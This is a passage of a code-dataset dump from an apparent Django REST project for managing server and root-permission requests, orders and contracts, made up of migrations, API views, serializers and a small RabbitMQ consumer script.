"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 15:00\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0007_auto_20170228_1103'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='serverapplication',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u5206\\u914d\\u5b8c\\u6210', '\\u5206\\u914d\\u5b8c\\u6210'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u56de\\u6536\\u7533\\u8bf7\\u4e2d', '\\u56de\\u6536\\u7533\\u8bf7\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n migrations.AlterField(\n model_name='serverapplication',\n name='orderId',\n field=models.CharField(blank=True, max_length=200, verbose_name='\\u8ba2\\u5355id'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6388856768608093,
"alphanum_fraction": 0.6445497870445251,
"avg_line_length": 38.86635971069336,
"blob_id": "18ee960b78933520e8c750328ca5e6dd6686f783",
"content_id": "9556ac097a30b306b3e49c6e6f392534e02ba9aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9009,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 217,
"path": "/apps/application/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.shortcuts import render\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework import generics\nfrom django.db.models import Q\nfrom django.http import Http404\nimport datetime\nfrom .serializers import RootApplicationSerializer,ServerApplicationSerializer,OrderSerializer\nfrom .models import RootApplication,ServerApplication,Order\nfrom utils import email_send\nfrom utils import findDate\n# Create your views here.\n\nclass Pagination(LimitOffsetPagination):\n default_limit = 10\n limit_query_param = \"limit\"\n offset_query_param = \"offset\"\n max_limit = None\n\nclass RootApplicationListView(generics.ListCreateAPIView):\n queryset = RootApplication.objects.all()\n pagination_class = Pagination\n serializer_class = RootApplicationSerializer\n\n#根据姓名、ip查询申请信息,姓名精确匹配,ip模糊匹配\n def get_queryset(self):\n user = self.request.query_params.get(\"user\",None)\n ip = self.request.query_params.get(\"ip\",None)\n queryset = RootApplication.objects.all()\n aQ = Q()\n if user is not None:\n aQ.add(Q(user=user),Q.AND)\n if ip is not None:\n aQ.add(Q(ip__startswith=ip),Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n\n\n # def get(self,request):\n # rootApplications = RootApplication.objects.all()\n # serializer = RootApplicationSerializer(rootApplications,many=True)\n # return Response(serializer.data)\n\n def post(self,request):\n serializer = RootApplicationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n email = request.data.get(\"email\", '')\n user = request.data.get(\"user\", \"\")\n ip = request.data.get(\"ip\", \"\")\n content = \"Hi \" + user + \", 你申请了 \" + ip + \"root权限,我们处理完毕后将以邮件的形式通知你;或者你也可以在'我的root权限申请中'跟踪申请状态\"\n email_send.send_email(email, content)\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\nclass RootApplicationDetailView(APIView):\n def get_object(self,pk):\n try:\n return RootApplication.objects.get(pk=pk)\n except RootApplication.DoesNotExist:\n raise Http404\n\n def get(self,request,pk):\n rootapplication = self.get_object(pk)\n serializer = RootApplicationSerializer(rootapplication)\n return Response(serializer.data)\n\n def put(self,request,pk):\n rootapplication = self.get_object(pk)\n serializer = RootApplicationSerializer(rootapplication,data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self,request,pk):\n rootapplication = self.get_object(pk)\n rootapplication.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass ServerApplicationListView(generics.ListCreateAPIView):\n queryset = ServerApplication.objects.all()\n pagination_class = Pagination\n serializer_class = ServerApplicationSerializer\n def get_queryset(self):\n user = self.request.query_params.get(\"user\", None)\n orderId = self.request.query_params.get(\"orderId\", None)\n status = self.request.query_params.get(\"status\",None)\n timeKey = self.request.query_params.get('timeKey',None)\n queryset = ServerApplication.objects.all()\n aQ = Q()\n # print datetime.datetime.now().date()\n if user is not None:\n aQ.add(Q(user=user), Q.AND)\n if orderId is not None and orderId != \"\":\n 
aQ.add(Q(orderId=orderId), Q.AND)\n if status is not None and status != \"\":\n aQ.add(Q(status=status),Q.AND)\n if timeKey is not None and timeKey != \"\":\n days = findDate.getDays(timeKey)\n if days==2017:\n aQ.add(Q(applyTime__startswith=days),Q.AND)\n elif days==0:\n aQ.add(Q(applyTime__lte=datetime.datetime.now()),Q.AND)\n else:\n date = findDate.getDate(days)\n aQ.add(Q(applyTime__gte=date) & Q(applyTime__lte=datetime.datetime.now()),Q.AND)\n\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n\n\n\n def post(self, request, *args, **kwargs):\n serializer = ServerApplicationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\nclass UsingApplicationDetailView(APIView):\n def get_object(self,pk):\n try:\n return ServerApplication.objects.get(pk=pk)\n except ServerApplication.DoesNotExist:\n raise Http404\n def get(self,request,pk):\n serverApplication = self.get_object(pk)\n serializer = ServerApplicationSerializer(serverApplication)\n return Response(serializer.data)\n\n def put(self,request,pk):\n serverApplication = self.get_object(pk)\n serializer = ServerApplicationSerializer(serverApplication,data=request.data)\n if serializer.is_valid():\n serializer.save()\n email = request.data.get(\"email\", '')\n user = request.data.get(\"user\", \"\")\n ip = request.data.get(\"ip\", \"\")\n statusDesc = request.data.get(\"status\")\n content = \"Hi \" + user + \", 你提交了 \" + ip +statusDesc[0:-1] +\",我们处理完毕后将以邮件的形式通知你\"\n\n email_send.send_email(email, content,send_type=\"服务器处理\")\n return Response(serializer.data)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n def delete(self,request,pk):\n serverapplication = self.get_object(pk)\n serverapplication.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass OrderListView(generics.ListCreateAPIView):\n queryset = Order.objects.all()\n pagination_class = Pagination\n serializer_class = OrderSerializer\n # def get_queryset(self):\n # user = self.request.query_params.get(\"user\", None)\n # ip = self.request.query_params.get(\"status\", None)\n # queryset = RootApplication.objects.all()\n # aQ = Q()\n # if user is not None:\n # aQ.add(Q(user=user), Q.AND)\n # if ip is not None:\n # aQ.add(Q(ip__startswith=status), Q.AND)\n # queryset = queryset.filter(aQ).order_by(\"id\")\n # return queryset\n\n\n def post(self, request, *args, **kwargs):\n serializer = OrderSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n user = self.request.data.get(\"user\", None)\n orderId = self.request.data.get(\"orderId\", None)\n email = self.request.data.get(\"email\",None)\n print(user,orderId,email)\n content = \"Hi \" + user + \", 你申请了服务器资源,订单号为\"+orderId+\",我们处理完毕后将以邮件的形式通知你;或者你也可以在'我的服务器申请中'跟踪申请状态\"\n email_send.send_email(email, content,\"服务器资源申请\")\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\nclass UsingApplicationsListView(generics.ListCreateAPIView):\n queryset = ServerApplication.objects.all()\n pagination_class = Pagination\n serializer_class = ServerApplicationSerializer\n\n # 获取状态为申请中或延期中的申请记录\n def get_queryset(self):\n user = self.request.query_params.get(\"user\", None)\n orderId = self.request.query_params.get(\"orderId\", None)\n queryset = ServerApplication.objects.filter(user=user)\n aQ = Q()\n # 
aQ.add(Q(user=user),Q.AND)\n aQ.add(Q(status=\"使用中\") | Q(status=\"延期中\"), Q.AND)\n if orderId is not None and orderId != \"\":\n aQ.add(Q(orderId=orderId), Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n # def get(self, request, *args, **kwargs):\n # user = self.request.query_params.get(\"user\", None)\n # orderId = self.request.query_params.get(\"orderId\", None)\n # queryset = ServerApplication.objects.filter(user=user)\n # aQ = Q()\n # aQ.add(Q(status=\"申请中\"), Q.AND)\n # if orderId is not None and orderId != \"\":\n # aQ.add(Q(orderId=orderId), Q.AND)\n # queryset = queryset.filter(aQ).order_by(\"id\")\n # return queryset\n"
},
{
"alpha_fraction": 0.5041208863258362,
"alphanum_fraction": 0.6002747416496277,
"avg_line_length": 43.121212005615234,
"blob_id": "913c7423ef90abb39d67ad712b507992af59f216",
"content_id": "f937c390de7b74631dab8f7ce62ede33a961580b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1456,
"license_type": "no_license",
"max_line_length": 232,
"num_lines": 33,
"path": "/apps/application/migrations/0001_initial.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-15 10:32\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='RootApplication',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('user', models.CharField(max_length=50, verbose_name='\\u7533\\u8bf7\\u4eba')),\n ('ip', models.CharField(max_length=50, verbose_name='\\u7533\\u8bf7ip')),\n ('reason', models.CharField(blank=True, default='', max_length=500, verbose_name='\\u7533\\u8bf7\\u539f\\u56e0')),\n ('status', models.CharField(choices=[('applying', '\\u7533\\u8bf7\\u4e2d'), ('using', '\\u4f7f\\u7528\\u4e2d'), ('done', '\\u5df2\\u56de\\u6536')], default='applying', max_length=20, verbose_name='\\u7533\\u8bf7\\u72b6\\u6001')),\n ('applyTime', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u7533\\u8bf7\\u65f6\\u95f4')),\n ('deadline', models.CharField(max_length=20, verbose_name='\\u622a\\u6b62\\u65e5\\u671f')),\n ],\n options={\n 'verbose_name': 'root\\u6743\\u9650\\u7533\\u8bf7',\n 'verbose_name_plural': 'root\\u6743\\u9650\\u7533\\u8bf7',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5737704634666443,
"alphanum_fraction": 0.6229507923126221,
"avg_line_length": 21.18181800842285,
"blob_id": "e7073e7e71b09b6ddbda5a67bb05fd0f3c247bde",
"content_id": "147e6166c3aa13faf5a8d002b6d459e739220bcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 11,
"path": "/apps/administrator/forms.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/4/28 11:08'\n\nfrom django import forms\nfrom .models import Script\n\nclass ModelFormWithFileField(forms.ModelForm):\n class Meta:\n model = Script\n fields = '__all__'\n"
},
{
"alpha_fraction": 0.4928571283817291,
"alphanum_fraction": 0.5882652997970581,
"avg_line_length": 46.80487823486328,
"blob_id": "d7a759a9ad008f50ba5d04d3e1387924ecbb46e2",
"content_id": "21926ad7af5e3fe3c15f5f36790e2fda60c4fd05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1960,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 41,
"path": "/apps/application/migrations/0007_auto_20170228_1103.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 11:03\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0006_auto_20170224_1017'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ServerApplication',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('user', models.CharField(max_length=20, verbose_name='\\u4f7f\\u7528\\u4eba')),\n ('username', models.CharField(max_length=200, verbose_name='\\u7528\\u6237\\u540d')),\n ('ip', models.CharField(max_length=20, verbose_name='IP')),\n ('source', models.CharField(max_length=50, verbose_name='\\u6765\\u6e90')),\n ('environment', models.CharField(max_length=50, verbose_name='\\u73af\\u5883\\u7c7b\\u522b')),\n ('os', models.CharField(max_length=20, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf')),\n ('deadline', models.DateTimeField(verbose_name='\\u622a\\u6b62\\u65e5\\u671f')),\n ('reason', models.CharField(max_length=500, verbose_name='\\u7533\\u8bf7\\u539f\\u56e0')),\n ('email', models.EmailField(max_length=100, verbose_name='\\u8054\\u7cfb\\u90ae\\u7bb1')),\n ('appId', models.CharField(max_length=200, verbose_name='\\u7533\\u8bf7id')),\n ('orderId', models.CharField(max_length=200, verbose_name='\\u8ba2\\u5355id')),\n ],\n options={\n 'verbose_name': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7',\n 'verbose_name_plural': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7',\n },\n ),\n migrations.AlterField(\n model_name='rootapplication',\n name='email',\n field=models.EmailField(max_length=100, verbose_name='\\u8054\\u7cfb\\u90ae\\u7bb1'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6393805146217346,
"alphanum_fraction": 0.6659291982650757,
"avg_line_length": 24.11111068725586,
"blob_id": "ab2f88b00df4eb74894b8e458c88b3bf6c7ba3c9",
"content_id": "7a6df62244436f7e96aaff8286d3a7a8a16c119c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 452,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 18,
"path": "/apps/users/serializers.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/14 22:07'\n\nfrom rest_framework import serializers\n\nfrom .models import UserProfile\n\nclass UserLoginSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = UserProfile\n fields = ('id','email','password')\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = ('id','nick_name','team','username')\n"
},
{
"alpha_fraction": 0.7688171863555908,
"alphanum_fraction": 0.7688171863555908,
"avg_line_length": 36.29999923706055,
"blob_id": "cd5faa371bc93acdc2435e9b640ed584d056e2d5",
"content_id": "b1f4d307c6568666682542b144a4894c702a66a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 10,
"path": "/media/scripts/2017/04/receive_xoA7jQU.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "import pika\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue=\"hello\")\n\ndef callback(ch,method,properties,body):\n\tprint(\"[x] Received %r\" % body)\nchannel.basic_consume(callback,queue=\"hello\",no_ack=True)\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()"
},
{
"alpha_fraction": 0.5262237787246704,
"alphanum_fraction": 0.618881106376648,
"avg_line_length": 25,
"blob_id": "3019d4de2276573bf66a9a266c312df9e44760d5",
"content_id": "a1a3435797fb33bee31cbe86891bf8b19bc51899",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 22,
"path": "/apps/application/migrations/0005_rootapplication_email.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-22 14:25\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0004_auto_20170220_1102'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='rootapplication',\n name='email',\n field=models.EmailField(default=datetime.datetime(2017, 2, 22, 14, 25, 15, 271000), max_length=100),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.49696969985961914,
"alphanum_fraction": 0.5927272439002991,
"avg_line_length": 46.14285659790039,
"blob_id": "f1bd6d152c5a72c41d45b0d1ea6f9df13b4ae255",
"content_id": "08172724dbbacf2496d8cab09fdb6b25c037d6c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1650,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 35,
"path": "/apps/contractBudget/migrations/0008_paymentrecord.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-31 17:08\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0007_paymentplan'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PaymentRecord',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('contractId', models.CharField(max_length=50, verbose_name='\\u5408\\u540c\\u7f16\\u53f7')),\n ('numOfPayments', models.IntegerField(verbose_name='\\u4ed8\\u6b3e\\u7b14\\u6570')),\n ('billNum', models.CharField(max_length=50, verbose_name='\\u62a5\\u8d26\\u5355\\u53f7')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u603b\\u8d39\\u7528')),\n ('billTime', models.CharField(max_length=50, verbose_name='\\u62a5\\u8d26\\u65f6\\u95f4')),\n ('processTime', models.CharField(max_length=50, verbose_name='\\u5ba1\\u6279\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('processTime',),\n 'verbose_name': '\\u4ed8\\u6b3e\\u8bb0\\u5f55',\n 'verbose_name_plural': '\\u4ed8\\u6b3e\\u8bb0\\u5f55',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.49821215867996216,
"alphanum_fraction": 0.6126340627670288,
"avg_line_length": 58.92856979370117,
"blob_id": "63f0c8033acb0b95b9fb826f2c97a78ab7d581d7",
"content_id": "0fc1d54486beb8003d6f838c3ea0663fa3d5614c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2517,
"license_type": "no_license",
"max_line_length": 238,
"num_lines": 42,
"path": "/apps/contractBudget/migrations/0005_contract.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-29 17:01\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0004_supplier'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contract',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('contractId', models.CharField(max_length=100, unique=True, verbose_name='\\u5408\\u540c\\u7f16\\u53f7')),\n ('lawId', models.CharField(blank=True, max_length=100, verbose_name='\\u5f8b\\u5ba1\\u7f16\\u53f7')),\n ('status', models.CharField(choices=[('\\u6267\\u884c\\u4e2d', '\\u6267\\u884c\\u4e2d'), ('\\u6267\\u884c\\u5b8c', '\\u6267\\u884c\\u5b8c'), ('\\u5df2\\u79fb\\u4ea4', '\\u5df2\\u79fb\\u4ea4')], default='\\u6267\\u884c\\u4e2d', max_length=10)),\n ('supplierId', models.CharField(max_length=100, verbose_name='\\u4e59\\u65b9\\u7f16\\u53f7')),\n ('accountName', models.CharField(max_length=50, verbose_name='\\u4e59\\u65b9\\u8d26\\u6237\\u540d\\u79f0')),\n ('bankMaster', models.CharField(max_length=50, verbose_name='\\u4e59\\u65b9\\u5f00\\u6237\\u884c')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u603b\\u8d39\\u7528')),\n ('signDate', models.DateTimeField(verbose_name='\\u7b7e\\u7f72\\u65f6\\u95f4')),\n ('subscriber', models.CharField(max_length=20, verbose_name='\\u7b7e\\u7f72\\u4eba')),\n ('handlerPerson', models.CharField(max_length=50, verbose_name='\\u5408\\u540c\\u7ecf\\u529e\\u4eba')),\n ('comment', models.CharField(max_length=200, verbose_name='\\u5408\\u540c\\u5185\\u5bb9')),\n ('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contractBudget.Project', verbose_name='\\u6240\\u5c5e\\u9879\\u76ee')),\n ],\n options={\n 'ordering': ('signDate',),\n 'verbose_name': '\\u5408\\u540c',\n 'verbose_name_plural': '\\u5408\\u540c',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5311827659606934,
"alphanum_fraction": 0.5956989526748657,
"avg_line_length": 22.25,
"blob_id": "0775083c749087648d603fbd729b3caeacac5ce9",
"content_id": "0075b83e9277bb8c02f147f2653dc0166444b30e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 20,
"path": "/apps/application/migrations/0015_order_user.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-08 19:02\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0014_merge'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='user',\n field=models.CharField(default='\\u5434\\u5efa\\u519b', max_length=200),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5708661675453186,
"alphanum_fraction": 0.625984251499176,
"avg_line_length": 24.399999618530273,
"blob_id": "0f3dd888df96cc5216992a7e0d2125a90e18915b",
"content_id": "6f69980b1041195da828da83bcf405f8b6e91857",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 20,
"path": "/apps/application/migrations/0012_auto_20170302_1422.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-02 14:22\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0011_remove_serverapplication_appid'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='serverapplication',\n name='orderId',\n field=models.CharField(max_length=200, verbose_name='\\u8ba2\\u5355id'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5469387769699097,
"alphanum_fraction": 0.6122449040412903,
"avg_line_length": 23.5,
"blob_id": "515d0c8734ae0a298e705b6c9eebec720bacb152",
"content_id": "ed285b221ba25050654a0f1b3237a7e71d222fdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0006_auto_20170330_1331.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-30 13:31\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0005_contract'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='contract',\n name='signDate',\n field=models.CharField(max_length=50, verbose_name='\\u7b7e\\u7f72\\u65f6\\u95f4'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4463955760002136,
"alphanum_fraction": 0.5286506414413452,
"avg_line_length": 35.06666564941406,
"blob_id": "3c23bdfa12e376657c682c8dff8f44e670d4de68",
"content_id": "a9457c804f5bc12c4fb9847c80e9ca554ca1a792",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1082,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 30,
"path": "/apps/application/migrations/0017_auto_20170321_1719.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-21 17:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0016_auto_20170315_1350'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='serverapplication',\n name='cpu',\n field=models.CharField(choices=[('1C', '1C'), ('2C', '2C'), ('4C', '4C'), ('8C', '8C'), ('16C', '16C'), ('32C', '32C')], default='1C', max_length=10),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='memory',\n field=models.CharField(choices=[('2G', '2G'), ('4G', '4G'), ('8G', '8G'), ('16G', '16G'), ('32G', '32G'), ('64G', '64G')], default='2G', max_length=10),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='store',\n field=models.CharField(choices=[('20G', '20G'), ('40G', '40G'), ('100G', '100G')], default='20G', max_length=10),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5242424011230469,
"alphanum_fraction": 0.6303030252456665,
"avg_line_length": 19.625,
"blob_id": "63a7785a4137f052b99301cc0e5418292c4ebf8e",
"content_id": "abc7a5f7be409df751431547b8eb1092a667b643",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 16,
"path": "/apps/application/migrations/0019_merge.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-22 10:08\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0017_auto_20170321_1719'),\n ('application', '0018_merge'),\n ]\n\n operations = [\n ]\n"
},
{
"alpha_fraction": 0.6887966990470886,
"alphanum_fraction": 0.7136929631233215,
"avg_line_length": 31.200000762939453,
"blob_id": "251ec96bdab04558b75dfb58da82b05b0ab1abbd",
"content_id": "ca48cdf81bd7ebae5005f09a9527f231eeffde89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 482,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 15,
"path": "/extra_apps/xadmin/plugins/excel.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/11 20:00'\n\nimport xadmin\nfrom xadmin.views import BaseAdminPlugin, ListAdminView\nfrom django.template import loader\n\nclass ListImportExcelPlugin(BaseAdminPlugin):\n import_excel = True\n\n def init_request(self, *args, **kwargs):\n return bool(self.import_excel)\n def block_top_toolbar(self,context,nodes):\n nodes.append(loader.render_to_string('xadmin/excel/model_list.top_toolbar.import.html'))"
},
{
"alpha_fraction": 0.5051652789115906,
"alphanum_fraction": 0.5630165338516235,
"avg_line_length": 31.266666412353516,
"blob_id": "8cfee053d0531e0c7a9e5216da3a74d386108a35",
"content_id": "5a38de00103b973a068bbc9d66a448d032770fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 968,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 30,
"path": "/apps/serverApplication/migrations/0005_auto_20170227_1554.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
